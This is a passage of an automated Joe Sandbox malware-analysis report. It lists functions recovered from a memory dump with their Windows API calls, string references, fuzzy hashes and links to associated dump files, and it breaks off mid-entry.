Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: dd746410b47ef2e4d881ebcc17534d3aaaeeb1d418bb1b1438d3ac515d0f49aa
Instruction ID: df96623e984c3311710c00099c18a9f6951caee16fe4f4cefb530d83707015f5
Opcode Fuzzy Hash: dd746410b47ef2e4d881ebcc17534d3aaaeeb1d418bb1b1438d3ac515d0f49aa
Instruction Fuzzy Hash: 6A61B170D00699EFDB20CFA8C898EEE7BBAEB01318F18411AF442A7791D7749D01DB20

Function 006F9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006F9AA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006F9AA8
GetWindowLongW.USER32(?,000000F0), ref: 006F9ACC
_memset.LIBCMT ref: 006F9ADD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006F9AEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006F9B67

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: a4ba5670546da72b45011e74ddd78edd1bf2db1b1dbe04759e0cbf4547b0ee5b
Instruction ID: df2ab4af07d3b1c7783550fbdda7187b50eebdcaf5ab5382d17dad1e1c9442c3
Opcode Fuzzy Hash: a4ba5670546da72b45011e74ddd78edd1bf2db1b1dbe04759e0cbf4547b0ee5b
Instruction Fuzzy Hash: 44615975A00208AFDB20DFA8CC81FEE77B9AB09710F104199FA15A73A1D774AD45DB64

Function 006D3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006D3591
GetAsyncKeyState.USER32(000000A0), ref: 006D3612
GetKeyState.USER32(000000A0), ref: 006D362D
GetAsyncKeyState.USER32(000000A1), ref: 006D3647
GetKeyState.USER32(000000A1), ref: 006D365C
GetAsyncKeyState.USER32(00000011), ref: 006D3674
GetKeyState.USER32(00000011), ref: 006D3686
GetAsyncKeyState.USER32(00000012), ref: 006D369E
GetKeyState.USER32(00000012), ref: 006D36B0
GetAsyncKeyState.USER32(0000005B), ref: 006D36C8
GetKeyState.USER32(0000005B), ref: 006D36DA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: aa716fc7eebcd49c32e3a0996525c6617e7b0886a840d538199c0080eab501ed
Instruction ID: 950c2294dc0c0e0f58523c4edc6a512174f9ae1aa44c680745c21c713588040b
Opcode Fuzzy Hash: aa716fc7eebcd49c32e3a0996525c6617e7b0886a840d538199c0080eab501ed
Instruction Fuzzy Hash: 5941B060D04BE97DFF308B6498143E5AEA26B11344F08805BD5C6463C2EBA4DBD8CBA7

Function 006CA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006CA2AA
SafeArrayAllocData.OLEAUT32(?), ref: 006CA2F5
VariantInit.OLEAUT32(?), ref: 006CA307
SafeArrayAccessData.OLEAUT32(?,?), ref: 006CA327
VariantCopy.OLEAUT32(?,?), ref: 006CA36A
SafeArrayUnaccessData.OLEAUT32(?), ref: 006CA37E
VariantClear.OLEAUT32(?), ref: 006CA393
SafeArrayDestroyData.OLEAUT32(?), ref: 006CA3A0
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006CA3A9
VariantClear.OLEAUT32(?), ref: 006CA3BB
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006CA3C6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c13973b03d13f6d158b99e971d1fe725dde5a9a750bde65781b79a28d5bfb5ab
Instruction ID: ed948850c6dd28852b1f3cf6d3c1083fa90bf37a497d839aa16a8f7fee6ca936
Opcode Fuzzy Hash: c13973b03d13f6d158b99e971d1fe725dde5a9a750bde65781b79a28d5bfb5ab
Instruction Fuzzy Hash: E2411C31900259ABDB11AFE8D854DEEBBBAFF44304F108069E905E7251DB34AA45CFA5

Function 006EB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

CoInitialize.OLE32 ref: 006EB298
CoUninitialize.COMBASE ref: 006EB2A3
CoCreateInstance.COMBASE(?,00000000,00000017,0071D8FC,?), ref: 006EB303
IIDFromString.COMBASE(?,?), ref: 006EB376
VariantInit.OLEAUT32(?), ref: 006EB410
VariantClear.OLEAUT32(?), ref: 006EB471

Strings

NULL Pointer assignment, xrefs: 006EB348
Failed to create object, xrefs: 006EB30E, 006EB3C4
Invalid parameter, xrefs: 006EB38F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 89e735581477830a8dcbf39f840841d7d5a2381aead1baf4807cb1343518d000
Instruction ID: 105a2f105072c25364e647015abc6bacaeac04563d910bbef9554b05ba1348aa
Opcode Fuzzy Hash: 89e735581477830a8dcbf39f840841d7d5a2381aead1baf4807cb1343518d000
Instruction Fuzzy Hash: EF61CC70205341AFC710DF59C889BAFB7EAAF88714F10481DF9859B291D770EE49CB96

Function 006E8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 006E86F5
inet_addr.WS2_32(?), ref: 006E873A
gethostbyname.WS2_32(?), ref: 006E8746
IcmpCreateFile.IPHLPAPI ref: 006E8754
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006E87C4
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006E87DA
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006E884F
WSACleanup.WS2_32 ref: 006E8855

Strings

Ping, xrefs: 006E8778

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: a020eff451742bd2000140b3248825afc30f455ac46a7607435699a9a5911be1
Instruction ID: bec9eb10944890561d1574f635e28baac2d0f6a574b26453df1cf031b89673c5
Opcode Fuzzy Hash: a020eff451742bd2000140b3248825afc30f455ac46a7607435699a9a5911be1
Instruction Fuzzy Hash: 125190316053019FDB20AF25CD45BAA7BE6AF48720F14892AF959DB2E1DB34EC05CF45

Function 006F9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F9C68
CreateMenu.USER32 ref: 006F9C83
SetMenu.USER32(?,00000000), ref: 006F9C92
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F9D1F
IsMenu.USER32(?), ref: 006F9D35
CreatePopupMenu.USER32 ref: 006F9D3F
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006F9D70
DrawMenuBar.USER32 ref: 006F9D7E

Strings

0, xrefs: 006F9C61

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 68541188194c029001759ff1c09dddf16580790714881468782abd4ecda25ff6
Instruction ID: 6d46856c9996875322f56fae08a6b203d1cf9b90d619b17925895a49afd14e87
Opcode Fuzzy Hash: 68541188194c029001759ff1c09dddf16580790714881468782abd4ecda25ff6
Instruction Fuzzy Hash: 39416975A00209EFDB25EF68D844BEA7BB6FF49314F248028EA4597391D774AD10CF64

Function 006DEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006DEC1E
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006DEC94
GetLastError.KERNEL32 ref: 006DEC9E
SetErrorMode.KERNEL32(00000000,READY), ref: 006DED0B

Strings

READONLY, xrefs: 006DECD6
READY, xrefs: 006DECE4
UNKNOWN, xrefs: 006DECC3
NOTREADY, xrefs: 006DECCA
INVALID, xrefs: 006DECDD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 3a5f185685e28dc5df768d321cd85966f2479cc6926ddce0f8448966983030fc
Instruction ID: c33d300e0805d45a63a2cbbee28ac03ab6c694eca66d2b97633f73d1a4024e0b
Opcode Fuzzy Hash: 3a5f185685e28dc5df768d321cd85966f2479cc6926ddce0f8448966983030fc
Instruction Fuzzy Hash: DA318135E40209EFCB10EB68C945EEAB7BAEF44710F14802AE515DB391DB769D42CB91

Function 006CC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006CC782
GetDlgCtrlID.USER32 ref: 006CC78D
GetParent.USER32 ref: 006CC7A9
SendMessageW.USER32(00000000,?,00000111,?), ref: 006CC7AC
GetDlgCtrlID.USER32(?), ref: 006CC7B5
GetParent.USER32(?), ref: 006CC7D1
SendMessageW.USER32(00000000,?,?,00000111), ref: 006CC7D4

Strings

ListBox, xrefs: 006CC73F
ComboBox, xrefs: 006CC707

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: b9deff898086e7d8897024323c7eb2058ef6e7675f6a618c7183a95449918997
Instruction ID: cd1326fdc0b5a6f57f9c8bf8e13eee5b21e28e6404c846cc8ff68a4633d2a927
Opcode Fuzzy Hash: b9deff898086e7d8897024323c7eb2058ef6e7675f6a618c7183a95449918997
Instruction Fuzzy Hash: 5421A174A00208BFDF05EBA4CC85EFEB77AEB45350F108119F966932D1DB795816AF24

Function 006CC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006CC869
GetDlgCtrlID.USER32 ref: 006CC874
GetParent.USER32 ref: 006CC890
SendMessageW.USER32(00000000,?,00000111,?), ref: 006CC893
GetDlgCtrlID.USER32(?), ref: 006CC89C
GetParent.USER32(?), ref: 006CC8B8
SendMessageW.USER32(00000000,?,?,00000111), ref: 006CC8BB

Strings

ListBox, xrefs: 006CC828
ComboBox, xrefs: 006CC7F0

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: bdb714d7e52334582d213e3d5637e7d857cc6a6a1ebe3a541bde1a8537a6a4dd
Instruction ID: ec22895b1ffa2b38390db51fdeba4e98d424684f093b25a70b063f381727931b
Opcode Fuzzy Hash: bdb714d7e52334582d213e3d5637e7d857cc6a6a1ebe3a541bde1a8537a6a4dd
Instruction Fuzzy Hash: EE21B371A01208BBDF01EBA4CC85EFEBB7AEF45310F108119F916E32D1DB7958169B24

Function 006CC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 006CC8D9
GetClassNameW.USER32(00000000,?,00000100), ref: 006CC8EE
_wcscmp.LIBCMT ref: 006CC900
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006CC97B

Strings

largeicons, xrefs: 006CC90F
SHELLDLL_DefView, xrefs: 006CC8FA
list, xrefs: 006CC95D
smallicons, xrefs: 006CC943
details, xrefs: 006CC929

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 64e77f112e9781ac30117c0832c664b169f496f3b98d860c7b1e4080f4657625
Instruction ID: c6cde1cbb41632a3514f8d26ab92d61a2db16ff5f7236282da5144f928f6a8a2
Opcode Fuzzy Hash: 64e77f112e9781ac30117c0832c664b169f496f3b98d860c7b1e4080f4657625
Instruction Fuzzy Hash: 4B1129F6648303B9FA142A34DC1AEF677EEDF07374B20401AF908E90D2FB7569529658

Function 006DB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 006DB137

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: bd9fa8a4420307f7054742a28af8969c7b3aefd39ff6b93aa8ee75301ca24725
Instruction ID: 2e4c6f983c00e70e4b341e592d79795573b9d6a207148a4d0095f5ab4487bded
Opcode Fuzzy Hash: bd9fa8a4420307f7054742a28af8969c7b3aefd39ff6b93aa8ee75301ca24725
Instruction Fuzzy Hash: 33C18E75E0021ADFDB44CF98C481BEEB7B6EF08311F25506AEA05E7381D734AA41DB94

Function 006BBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 006BBA74

Part of subcall function 006B8984: __mtinitlocknum.LIBCMT ref: 006B8996
Part of subcall function 006B8984: RtlEnterCriticalSection.NTDLL(006B0127), ref: 006B89AF

__calloc_crt.LIBCMT ref: 006BBA85

Part of subcall function 006B7616: __calloc_impl.LIBCMT ref: 006B7625
Part of subcall function 006B7616: Sleep.KERNEL32(00000000,?,006B0127,?,0069125D,00000058,?,?), ref: 006B763C

@_EH4_CallFilterFunc@8.LIBCMT ref: 006BBAA0
GetStartupInfoW.KERNEL32(?,00746990,00000064,006B6B14,007467D8,00000014), ref: 006BBAF9
__calloc_crt.LIBCMT ref: 006BBB44
GetFileType.KERNEL32(00000001), ref: 006BBB8B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 006BBBC4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 3bc1557615c642fabeadfce8a8c5a17a51ed70a2bd18b2453fd296d023529962
Instruction ID: 64e51196a07690a239a7bd328d3b960641971526f37106082fc68e1a13f2f3dc
Opcode Fuzzy Hash: 3bc1557615c642fabeadfce8a8c5a17a51ed70a2bd18b2453fd296d023529962
Instruction Fuzzy Hash: 1581C6B1D047458FDB24CF68C8805EDBBF1AF45324B24925DD4A6AB3D1DBB89883CB58

Function 006D4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006D4A7D
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4A91
GetWindowThreadProcessId.USER32(00000000), ref: 006D4A98
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4AA7
GetWindowThreadProcessId.USER32(?,00000000), ref: 006D4AB9
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4AD2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4AE4
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4B29
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4B3E
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006D3AD7,?,00000001), ref: 006D4B49

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d25e2cca589bd6ecead8f6497fd00e9c772172d81b58204c9554e088f310d666
Instruction ID: b52a419cc8dfbe6560ef2bc7afcd5604bb92f271fccce9debca25c599ea1f38c
Opcode Fuzzy Hash: d25e2cca589bd6ecead8f6497fd00e9c772172d81b58204c9554e088f310d666
Instruction Fuzzy Hash: 90316171A00304AFDB219B54DC89BE977AAAB54396F14C01BF909D73A0DBF8DD408F68

Function 0070EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 0070EC32
SendMessageW.USER32(?,00001328,00000000,?), ref: 0070EC49
GetWindowDC.USER32(?), ref: 0070EC55
GetPixel.GDI32(00000000,?,?), ref: 0070EC64
ReleaseDC.USER32(?,00000000), ref: 0070EC76
GetSysColor.USER32(00000005), ref: 0070EC94

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
